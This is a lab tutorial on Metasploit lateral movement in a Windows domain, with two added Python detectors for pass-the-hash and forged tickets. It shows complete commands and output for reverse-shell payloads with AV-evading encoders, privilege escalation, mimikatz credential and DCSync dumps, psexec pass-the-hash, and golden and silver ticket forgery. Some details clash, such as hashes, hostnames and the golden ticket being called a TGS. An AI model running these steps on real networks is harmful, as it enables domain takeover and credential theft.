Using MSF for PtH and PtT
0x00 Overview
Environment
Attacker (MSF): 172.20.10.2
DC (Server2008R2X64): 10.11.11.5
Target (Win7ProX86): 10.11.11.14
PtH and PtT
PtH is generally used for lateral movement inside the domain.
PtT is generally used once the domain controller has already been compromised, for persistence.
0x01 Preparation
Generate the payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.20.10.2 LPORT=4444 -b '\x00\x0a\xff' --platform windows -a x86 -e x86/shikata_ga_nai -i 5 -f exe -o 86.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.20.10.2 LPORT=4444 -b '\x00' --platform windows -a x64 -e x64/xor -i 5 -f exe -o 64.exe

# -p          payload to use (msfvenom -l payloads lists all payloads)
# -a          target instruction-set architecture
# -e          encoder to use (repeated encoding can evade AV; msfvenom -l encoders lists the encoders)
# -i          number of encoding iterations
# --platform  platform of the target
# -f          output format (msfvenom --help-formats lists the formats)
Configure the listener
ExitOnSession: keep listening on the port after a session is received, to avoid hangs and fake sessions
SessionCommunicationTimeout: by default a session with no activity for 5 minutes is killed; this can be set to 0
SessionExpirationTimeout: by default a session is forcibly closed after one week; set it to 0 and it is never closed
EnableStageEncoding: whether the second-stage payload is encoded
StageEncoder: which encoder to use
StageEncodingFallback: whether to fall back to the default encoder (for example x86/shikata_ga_nai) when the encoder given by StageEncoder fails to encode the payload. With set StageEncodingFallback false there is no fallback on failure, which helps keep stage encoding consistent and predictable.
exploit -j -z: -j runs the exploit as a background job; -z means the stage is not actively sent after success.

msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 0.0.0.0
msf exploit(multi/handler) > set LPORT 4444
msf exploit(multi/handler) > set ExitOnSession false
msf exploit(multi/handler) > set SessionCommunicationTimeout 36000
msf exploit(multi/handler) > set SessionExpirationTimeout 36000
// msf exploit(multi/handler) > set EnableStageEncoding true
// msf exploit(multi/handler) > set StageEncoder x64/xor
// msf exploit(multi/handler) > set StageEncodingFallback false
msf exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 0.0.0.0:4444
msf exploit(multi/handler) > jobs

Jobs
====

  Id  Name                    Payload                          Payload opts
  --  ----                    -------                          ------------
  0   Exploit: multi/handler  windows/meterpreter/reverse_tcp  tcp://0.0.0.0:4444
0x02 Reverse shell from the target
Run the generated payload 86.exe on the target host and a shell comes back:

msf6 exploit(multi/handler) >
[*] Sending stage (175686 bytes) to 172.20.10.2
[*] Meterpreter session 1 opened (172.20.10.2:4444 -> 172.20.10.2:60181) at 2023-03-06 12:31:17 +0800
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information              Connection
  --  ----  ----                     -----------              ----------
  1         meterpreter x86/windows  TEST\zhangsan @ WIN7PRO  172.20.10.2:4444 -> 172.20.10.14:60997 (172.20.10.14)

msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: TEST\zhangsan
Process migration
Migrate into Explorer so the target cannot spot our process in Task Manager or with tasklist.
Commonly injected processes: svchost.exe, explorer.exe, lsass.exe, services.exe, winlogon.exe, rundll32.exe, taskhost.exe, spoolsv.exe

meterpreter > ps

Process List
============

 PID   PPID  Name              Arch  Session  User           Path
 ---   ----  ----              ----  -------  ----           ----
 0     0     [System Process]
 4     0     System
 272   4     smss.exe
 444   384   winlogon.exe
 504   396   lsass.exe
 692   832   dwm.exe           x86   1        TEST\zhangsan  C:\Windows\system32\Dwm.exe
 808   1272  explorer.exe      x86   1        TEST\zhangsan  C:\Windows\Explorer.EXE
 1548  488   kms-server.exe
 1964  488   taskhost.exe      x86   1        TEST\zhangsan  C:\Windows\system32\taskhost.exe
 2072  2748  msiexec.exe       x86   1                       C:\Windows\System32\msiexec.exe

meterpreter > migrate 808
[*] Migrating from 2748 to 808...
[*] Migration completed successfully.
meterpreter > background
[*] Backgrounding session 1...
Privilege escalation
Use local_exploit_suggester to get the exploits msf suggests:

msf6 exploit(multi/handler) > run post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 172.20.10.2 - Collecting local exploits for x86/windows...
[*] 172.20.10.2 - 168 exploit checks are being tried...
[+] 172.20.10.2 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 172.20.10.2 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 172.20.10.2 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 172.20.10.2 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 172.20.10.2 - Valid modules for session 3:
============================

 #  Name                                              Potentially Vulnerable?  Check Result
 -  ----                                              -----------------------  ------------
 1  exploit/windows/local/bypassuac_eventvwr          Yes                      The target appears to be vulnerable.
 2  exploit/windows/local/ms10_015_kitrap0d           Yes                      The service is running, but could not be validated.
 3  exploit/windows/local/ms15_004_tswbproxy          Yes                      The service is running, but could not be validated.
 4  exploit/windows/local/ms15_051_client_copy_image  Yes                      The target appears to be vulnerable.
 5  exploit/windows/local/bthpan                      No                       The target is not exploitable.
 ......
 ......
[*] Post module execution completed

Escalate with one of the exploits msf suggested:

msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d
msf6 exploit(exploit/windows/local/ms10_015_kitrap0d) > set session 1
msf6 exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 172.20.10.2:4444
[*] Reflectively injecting payload and triggering the bug...
[*] Launching msiexec to host the DLL...
[+] Process 2072 launched.
[*] Reflectively injecting the DLL into 2072...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175686 bytes) to 172.20.10.2
[*] Meterpreter session 2 opened (172.20.10.2:4444 -> 172.20.10.14:61686) at 2023-03-06 12:40:02 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 680 created.
Channel 2 created.
Microsoft Windows [版本 6.1.7600]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Users\zhangsan\Desktop>chcp 65001
chcp 65001
Active code page: 65001

C:\Users\zhangsan\Desktop>net group "domain admins" /domain
net group "domain admins" /domain
The request will be processed at a domain controller for domain test.com.

Group name     Domain Admins
Comment        指定的域管理员

Members

-------------------------------------------------------------------------------
admin                    Administrator
The command completed successfully.

C:\Users\zhangsan\Desktop>exit
exit
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(windows/local/ms10_015_kitrap0d) > sessions

Active sessions
===============

  Id  Name  Type                     Information                    Connection
  --  ----  ----                     -----------                    ----------
  1         meterpreter x86/windows  TEST\zhangsan @ WIN7PRO        172.20.10.2:4444 -> 172.20.10.14:60181 (172.20.10.14)
  2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WIN7PRO  172.20.10.2:4444 -> 172.20.10.14:61686 (172.20.10.14)
0x03 Pass-the-Hash attack (PtH)
First, with SYSTEM privileges on a domain member, obtain the NTLM hashes:

msf6 exploit(windows/local/ms10_015_kitrap0d) > sessions 2
[*] Starting interaction with 2...
meterpreter > load kiwi
meterpreter > kiwi_cmd sekurlsa::logonpasswords

Authentication Id : 0 ; 405357 (00000000:00062f6d)
Session           : CachedInteractive from 1
User Name         : Administrator
Domain            : TEST
Logon Server      : WIN-2008
Logon Time        : 2023/3/5 21:06:10
SID               : S-1-5-21-3160176211-3702513722-812664031-500
        msv :
         [00000003] Primary
         * Username   : Administrator
         * Domain     : TEST
         * LM         : f26fb3ae03e93ab913328873c0db4945
         * NTLM       : 0e032b9d51a580ac6cdfabad8bc97a38
         * SHA1       : c17a16040770e68ea65ce528b5f503dba3663d16
......
......

Authentication Id : 0 ; 136194 (00000000:00021402)
Session           : Interactive from 1
User Name         : zhangsan
Domain            : TEST
Logon Server      : WIN-2008
Logon Time        : 2023/3/5 20:31:02
SID               : S-1-5-21-3160176211-3702513722-812664031-1118
        msv :
         [00000003] Primary
         * Username   : zhangsan
         * Domain     : TEST
         * LM         : 1c27b75762feeeb3e72c57ef50f76a05
         * NTLM       : 993ca38cf7795d31bc429a8b9903a01a
         * SHA1       : 491010a4fb3715098e98c855175c841ac2d1badc
......
......

List the members of the Domain Admins group:

meterpreter > shell
Process 716 created.
Channel 3 created.
Microsoft Windows [版本 6.1.7600]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Users\zhangsan\Desktop>chcp 65001
chcp 65001
Active code page: 65001

C:\Users\zhangsan\Desktop>net group "domain admins" /domain
net group "domain admins" /domain
The request will be processed at a domain controller for domain test.com.

Members

-------------------------------------------------------------------------------
admin                    Administrator
The command completed successfully.

meterpreter > background
[*] Backgrounding session 2...
Use PtH to gain access to the DC
Use the hash of a Domain Admins member; here the user admin:

msf6 exploit(windows/local/ms10_015_kitrap0d) > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting                                                    Required  Description
   ----                  ---------------                                                    --------  -----------
   RHOSTS                10.11.11.5                                                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                 445                                                                yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                                                                      no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                                     no        The service display name
   SERVICE_NAME                                                                             no        The service name
   SMBDomain             test.com                                                           no        The Windows domain to use for authentication
   SMBPass               00000000000000000000000000000000:209c6174da490caeb422f3fa5a7ae634  no        The password for the specified username
   SMBSHARE                                                                                 no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBUser               admin                                                              no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.20.10.2      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 172.20.10.2:4444
[*] 10.11.11.5:445 - Connecting to the server...
[*] 10.11.11.5:445 - Authenticating to 10.11.11.5:445|test.com as user 'admin'...
[*] 10.11.11.5:445 - Selecting native target
[*] 10.11.11.5:445 - Uploading payload... qusizJPL.exe
[*] 10.11.11.5:445 - Created \qusizJPL.exe...
[+] 10.11.11.5:445 - Service started successfully...
[*] Sending stage (175686 bytes) to 172.20.10.2
[*] 10.11.11.5:445 - Deleting \qusizJPL.exe...
[*] Meterpreter session 7 opened (172.20.10.2:4444 -> 172.20.10.5:65265) at 2023-03-06 14:28:01 +0800

meterpreter > ifconfig

Interface 65539
============
Name         : Parallels Ethernet Adapter
Hardware MAC : 00:1c:42:5e:07:99
MTU          : 1500
IPv4 Address : 10.11.11.5
IPv4 Netmask : 255.255.255.0
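From the defender's side, the psexec run above leaves two artifacts on the DC: a network (type 3) logon that used NTLM for a domain-admin account, and a service install whose name is eight random letters. The following is an added example, not code from the original post or from Metasploit; the event records are constructed to mimic the fields of Windows Security event 4624 and System event 7045, and the privileged-account list is an assumed allow-list.

```python
import re

# Constructed sample records (not real exports from the lab above), shaped
# like the fields of Windows Security event 4624 (logon) and System event
# 7045 (a new service was installed).
CONSTRUCTED_EVENTS = [
    # NTLM network logon as a domain admin, from the compromised workstation
    {"EventID": 4624, "Computer": "WIN-2008", "TargetUserName": "admin",
     "TargetDomainName": "TEST", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "IpAddress": "10.11.11.14"},
    # service registered by psexec: eight random letters, binary outside System32
    {"EventID": 7045, "Computer": "WIN-2008", "ServiceName": "qusizJPL",
     "ImagePath": "%SystemRoot%\\qusizJPL.exe", "StartType": "demand start"},
    # benign interactive Kerberos logon
    {"EventID": 4624, "Computer": "WIN-2008", "TargetUserName": "zhangsan",
     "TargetDomainName": "TEST", "LogonType": 2,
     "AuthenticationPackageName": "Kerberos", "IpAddress": "-"},
    # benign service install with a normal name and a System32 binary
    {"EventID": 7045, "Computer": "WIN-2008", "ServiceName": "Spooler",
     "ImagePath": "C:\\Windows\\System32\\spoolsv.exe", "StartType": "auto start"},
]

# Assumed allow-list: accounts whose NTLM network logons to a DC deserve a second look.
PRIVILEGED_ACCOUNTS = {"admin", "administrator"}
# Metasploit's psexec module names its service with eight random letters by default.
RANDOM_SERVICE_NAME = re.compile(r"^[A-Za-z]{8}$")


def ntlm_network_logons(events, privileged=PRIVILEGED_ACCOUNTS):
    """4624 logons of type 3 (network) that used NTLM for a privileged account.
    Inside a domain Kerberos is the norm, so NTLM to a DC for a domain admin is
    the footprint a hash-based SMB logon leaves."""
    return [e for e in events
            if e.get("EventID") == 4624 and e.get("LogonType") == 3
            and e.get("AuthenticationPackageName") == "NTLM"
            and e.get("TargetUserName", "").lower() in privileged]


def suspicious_service_installs(events):
    """7045 installs whose name is eight random letters and whose binary is
    not under System32: the upload-and-register pattern of psexec."""
    hits = []
    for e in events:
        if e.get("EventID") != 7045:
            continue
        name = e.get("ServiceName", "")
        path = e.get("ImagePath", "").lower()
        if RANDOM_SERVICE_NAME.match(name) and "\\system32\\" not in path:
            hits.append(e)
    return hits


def pth_psexec_alerts(events):
    """Correlate a privileged NTLM network logon with a suspicious service
    install on the same host; returns (host, user, service) triples."""
    alerts = []
    for logon in ntlm_network_logons(events):
        for svc in suspicious_service_installs(events):
            if logon["Computer"] == svc["Computer"]:
                alerts.append((logon["Computer"], logon["TargetUserName"], svc["ServiceName"]))
    return alerts


if __name__ == "__main__":
    for host, user, service in pth_psexec_alerts(CONSTRUCTED_EVENTS):
        print(f"[ALERT] {host}: NTLM network logon as {user} followed by service install {service}")
```

On a real estate the same two checks are fed from the DC's Security and System logs; the correlation is what keeps the rule quiet, since random-looking service names and NTLM logons each occur on their own. Putting domain admins in the Protected Users group, which disables NTLM for them, removes the first half of the pattern entirely.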
0x04 Golden ticket
A golden ticket is a forged TGS. It is generally used for persistence after the DC has been taken, because the password of the krbtgt domain account is almost never changed.
Requirements
- domain name
- domain SID
- krbtgt NTLM hash (requires having taken the DC)
Get the DC name from a shell as an ordinary domain user
Change the code page:

C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001

net config workstation | findstr domain returns the domain name:

C:\Users\zhangsan\Desktop>net config workstation | findstr domain
net config workstation | findstr domain
Workstation domain                   TEST
Logon domain                         TEST

nltest /dsgetdc:TEST returns the DC hostname, \\WIN-2008:

C:\Users\zhangsan\Desktop>nltest /dsgetdc:TEST
nltest /dsgetdc:TEST
           DC: \\WIN-2008
      Address: \\10.11.11.5
     Dom Guid: 319da0ce-39fd-4861-8e18-6a2264cfe874
     Dom Name: TEST
  Forest Name: test.com
 Dc Site Name: Default-First-Site-Name
Our Site Name: Default-First-Site-Name
        Flags: PDC GC DS LDAP KDC TIMESERV GTIMESERV WRITABLE DNS_FOREST CLOSE_SITE FULL_SECRET WS
The command completed successfully
Get the domain SID as an ordinary domain user
kiwi_cmd token::whoami

meterpreter > kiwi_cmd token::whoami
 * Process Token : {0;0001a410} 1 D 111721      TEST\zhangsan   S-1-5-21-3160176211-3702513722-812664031-1118   (10g,05p)       Primary
 * Thread Token  : no token

whoami /user

C:\Windows\system32>whoami /user
whoami /user

USER INFORMATION
----------------

User Name      SID
============= =============================================
test\zhangsan  S-1-5-21-3160176211-3702513722-812664031-1118

wmic useraccount get name,sid

C:\Users\zhangsan\Desktop>wmic useraccount get name,sid
wmic useraccount get name,sid
Name           SID
Administrator  S-1-5-21-2772043085-310273303-638560154-500
Guest          S-1-5-21-2772043085-310273303-638560154-501
reber          S-1-5-21-2772043085-310273303-638560154-1000
Administrator  S-1-5-21-3160176211-3702513722-812664031-500
Guest          S-1-5-21-3160176211-3702513722-812664031-501
krbtgt         S-1-5-21-3160176211-3702513722-812664031-502
zhangsan       S-1-5-21-3160176211-3702513722-812664031-1118
lisi           S-1-5-21-3160176211-3702513722-812664031-1126
admin          S-1-5-21-3160176211-3702513722-812664031-1128
Get the krbtgt NTLM hash with Domain Admins privileges
The kiwi module supports both 32-bit and 64-bit systems; by default the 32-bit build is loaded.
If the current session is x86 and the DC is x64, inject into an x64 process first.

meterpreter > load kiwi
Success.
meterpreter > kiwi_cmd lsadump::dcsync /domain:test.com /all /csv
502     krbtgt          3f92886413f9d4ab78e03c6275a71b85        514
1127    WIN2003$        5ad1bf868f8ddbe900c15dfe82e6c08e        4096
1008    WIN-2008$       f048fbe3fc1722d6a83388364dab9cdc        532480
500     Administrator   0e032b9d51a580ac6cdfabad8bc97a38        512
1118    zhangsan        993ca38cf7795d31bc429a8b9903a01a        66048
1126    lisi            6447286bfde2f1ac790331e33b819657        66048
1123    WIN7PRO2$       c4f03bb85e00c17788e8d9ee5c60aef0        4096
1122    WIN7PRO$        2d688c9797ca9f14639c541f289479ed        4096
1128    admin           209c6174da490caeb422f3fa5a7ae634        66048

Generate the ticket with Domain Admins privileges:

meterpreter > golden_ticket_create -d test.com -s S-1-5-21-3160176211-3702513722-812664031 -k 3f92886413f9d4ab78e03c6275a71b85 -u abc -t /tmp/abc.kirbi

Import the ticket as an ordinary domain user:

meterpreter > getuid
Server username: TEST\zhangsan
meterpreter > kerberos_ticket_purge
[+] Kerberos tickets purged
meterpreter > kerberos_ticket_use /tmp/abc.kirbi
[*] Using Kerberos ticket stored in /tmp/abc.kirbi, 1820 bytes ...
[+] Kerberos ticket applied successfully.
meterpreter > kerberos_ticket_list
[+] Kerberos tickets found in the current session.

[00000000] - 0x00000017 - rc4_hmac_nt
   Start/End/MaxRenew: 2023/3/24 4:11:16 ; 2033/3/21 12:11:16 ; 2033/3/21 12:11:16
   Server Name       : krbtgt/test.com @ test.com
   Client Name       : abc @ test.com
   Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;

meterpreter > shell
Process 3796 created.
Channel 2 created.
Microsoft Windows [版本 6.1.7600]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Users\zhangsan\Desktop>chcp 65001
chcp 65001
Active code page: 65001

C:\Users\zhangsan\Desktop>dir \\WIN-2008\C$
dir \\WIN-2008\C$
 Volume in drive \\WIN-2008\C$ has no label.
 Volume Serial Number is B08C-EB53

 Directory of \\WIN-2008\C$

2009/07/13  20:20    <DIR>          PerfLogs
2018/07/26  21:51    <DIR>          Program Files
2023/03/02  20:45    <DIR>          Program Files (x86)
2017/09/12  20:49    <DIR>          Users
2023/03/06  00:44    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)  124,080,254,976 bytes free
0x05 Silver ticket
A silver ticket is a forged TGS. It never goes through the KDC, so it is stealthier, but its privileges fall far short of a golden ticket's.
Usable services

Service                      Service name
WMI                          HOST, RPCSS
PowerShell Remoting          HOST, HTTP
WinRM                        HOST, HTTP
Scheduled Tasks              HOST
Windows File Share (CIFS)    CIFS
LDAP, DCSync                 LDAP
Windows Remote Server        RPCSS, LDAP, CIFS

Requirements
- domain name
- domain SID
- NTLM hash of the service account
- FQDN of the target server
- a usable service
Get the domain name, SID and NTLM hash with SYSTEM privileges on a domain member
Domain      : TEST
User Server : DC$
SID         : S-1-5-21-3160176211-3702513722-812664031
NTLM        : 993ca38cf7795d31bc429a8b9903a01a

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Success.
meterpreter > kiwi_cmd sekurlsa::logonpasswords

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : DC$
Domain            : TEST
Logon Server      : (null)
Logon Time        : 2023/3/25 10:42:15
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username   : DC$
         * Domain     : TEST
         * NTLM       : 993ca38cf7795d31bc429a8b9903a01a
         * SHA1       : 104c7eec951d84ce412bd21e123b67520688f570

meterpreter > shell
Process 2732 created.
Channel 3 created.
Microsoft Windows [版本 6.1.7600]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>wmic useraccount get name,sid
wmic useraccount get name,sid
Name           SID
Administrator  S-1-5-21-3160176211-3702513722-812664031-500
Guest          S-1-5-21-3160176211-3702513722-812664031-501
krbtgt         S-1-5-21-3160176211-3702513722-812664031-502
zhangsan       S-1-5-21-3160176211-3702513722-812664031-1118
lisi           S-1-5-21-3160176211-3702513722-812664031-1126
admin          S-1-5-21-3160176211-3702513722-812664031-1128
Import the ticket directly as an ordinary domain user

meterpreter > getuid
Server username: TEST\zhangsan
meterpreter > kerberos_ticket_purge
[+] Kerberos tickets purged
meterpreter > kiwi_cmd kerberos::golden /domain:test.com /sid:S-1-5-21-3160176211-3702513722-812664031 /target:dc.test.com /service:cifs /rc4:993ca38cf7795d31bc429a8b9903a01a /user:abc /ptt
User      : abc
Domain    : test.com (TEST)
SID       : S-1-5-21-3160176211-3702513722-812664031
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 993ca38cf7795d31bc429a8b9903a01a - rc4_hmac_nt
Service   : cifs
Target    : dc.test.com
Lifetime  : 2023/3/24 22:30:08 ; 2033/3/21 22:30:08 ; 2033/3/21 22:30:08
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'abc @ test.com' successfully submitted for current session

meterpreter > kerberos_ticket_list
[+] Kerberos tickets found in the current session.

[00000000] - 0x00000017 - rc4_hmac_nt
   Start/End/MaxRenew: 2023/3/24 22:30:08 ; 2033/3/21 22:30:08 ; 2033/3/21 22:30:08
   Server Name       : cifs/dc.test.com @ test.com
   Client Name       : abc @ test.com
   Flags 40a00000    : pre_authent ; renewable ; forwardable ;

After the silver ticket is imported, the DC's C: drive can be listed directly:

meterpreter > shell
Process 2004 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7600]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Users\zhangsan\Desktop>chcp 65001
chcp 65001
Active code page: 65001

C:\Users\zhangsan\Desktop>dir \\win-2008\c$
dir \\win-2008\c$
 Volume in drive \\win-2008\c$ has no label.
 Volume Serial Number is B08C-EB53

 Directory of \\win-2008\c$

2009/07/13  20:20    <DIR>          PerfLogs
2018/07/26  21:51    <DIR>          Program Files
2023/03/02  20:45    <DIR>          Program Files (x86)
2017/09/12  20:49    <DIR>          Users
2023/03/06  00:44    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)  124,094,062,592 bytes free
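Both ticket listings above, the golden ticket in 0x04 and the silver ticket here, share the traits an endpoint audit can key on: a ten-year lifetime where the domain policy allows ten hours, a client principal (abc) that is not a real account, RC4 encryption on a TGT, and, for the silver ticket, a service ticket with no TGT behind it. The following is an added example, not code from the original post or from Metasploit; it parses the kerberos_ticket_list text format shown above and audits it. The two listings are constructed samples in that format, the policy limits are the Windows defaults, and the known-account set is an assumed allow-list.

```python
import re
from datetime import datetime, timedelta

# Constructed listings in the shape of meterpreter's kerberos_ticket_list
# output (not copied from the post). The first holds a forged TGT beside a
# legitimate one; the second holds a forged service ticket and no TGT at all.
CONSTRUCTED_GOLDEN_LISTING = """\
[00000000] - 0x00000017 - rc4_hmac_nt
   Start/End/MaxRenew: 2023/3/24 4:11:16 ; 2033/3/21 12:11:16 ; 2033/3/21 12:11:16
   Server Name       : krbtgt/test.com @ test.com
   Client Name       : abc @ test.com
   Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;
[00000001] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 2023/3/24 9:00:00 ; 2023/3/24 19:00:00 ; 2023/3/31 9:00:00
   Server Name       : krbtgt/test.com @ test.com
   Client Name       : zhangsan @ test.com
   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
"""

CONSTRUCTED_SILVER_LISTING = """\
[00000000] - 0x00000017 - rc4_hmac_nt
   Start/End/MaxRenew: 2023/3/24 22:30:08 ; 2033/3/21 22:30:08 ; 2033/3/21 22:30:08
   Server Name       : cifs/dc.test.com @ test.com
   Client Name       : abc @ test.com
   Flags 40a00000    : pre_authent ; renewable ; forwardable ;
"""

ENTRY_RE = re.compile(r"^\[(\d+)\] - 0x[0-9a-fA-F]+ - (\S+)")
TIME_FMT = "%Y/%m/%d %H:%M:%S"

# Windows default Kerberos policy: TGT 10 hours, service ticket 600 minutes.
MAX_TGT_LIFETIME = timedelta(hours=10)
MAX_SERVICE_LIFETIME = timedelta(minutes=600)
# Assumed allow-list of accounts that actually exist in the domain.
KNOWN_ACCOUNTS = {"administrator", "zhangsan", "lisi", "admin"}


def parse_ticket_list(text):
    """Turn a kerberos_ticket_list dump into dicts: etype, start, end, server, client."""
    tickets, current = [], None
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:                                  # "[00000000] - 0x17 - rc4_hmac_nt" opens an entry
            current = {"etype": m.group(2)}
            tickets.append(current)
            continue
        if current is None:
            continue
        field, _, value = line.strip().partition(":")
        field = field.strip()
        if field == "Start/End/MaxRenew":
            start, end, _renew = [p.strip() for p in value.split(";")]
            current["start"] = datetime.strptime(start, TIME_FMT)
            current["end"] = datetime.strptime(end, TIME_FMT)
        elif field == "Server Name":
            current["server"] = value.strip()
        elif field == "Client Name":
            current["client"] = value.strip()
    return tickets


def audit_tickets(tickets, known=KNOWN_ACCOUNTS):
    """Return one finding string per forged-ticket indicator."""
    findings = []
    clients_with_tgt = {t["client"] for t in tickets if t["server"].startswith("krbtgt/")}
    for t in tickets:
        is_tgt = t["server"].startswith("krbtgt/")
        label = f'{t["client"]} -> {t["server"]}'
        lifetime = t["end"] - t["start"]
        limit = MAX_TGT_LIFETIME if is_tgt else MAX_SERVICE_LIFETIME
        if lifetime > limit:
            findings.append(f"{label}: lifetime {lifetime} exceeds policy maximum {limit}")
        user = t["client"].split("@")[0].strip().lower()
        if user not in known:
            findings.append(f"{label}: client principal is not a known account")
        if is_tgt and t["etype"] == "rc4_hmac_nt":
            findings.append(f"{label}: TGT encrypted with RC4 where AES is expected")
        if not is_tgt and t["client"] not in clients_with_tgt:
            findings.append(f"{label}: service ticket present with no TGT for this client")
    return findings


if __name__ == "__main__":
    for name, listing in (("golden", CONSTRUCTED_GOLDEN_LISTING),
                          ("silver", CONSTRUCTED_SILVER_LISTING)):
        for finding in audit_tickets(parse_ticket_list(listing)):
            print(f"[{name}] {finding}")
```

The lifetime check is the one that survives even when an attacker picks a real account name: mimikatz and the kiwi wrapper default to a ten-year ticket, and nothing issued by a real KDC under default policy lives that long. On the domain controller side, the silver ticket's "never goes through the KDC" property means the DC has no 4768/4769 record for it, so the service host's own logon events (4624 with no preceding TGS request) are where the gap shows. Rotating the krbtgt password twice invalidates every golden ticket outstanding.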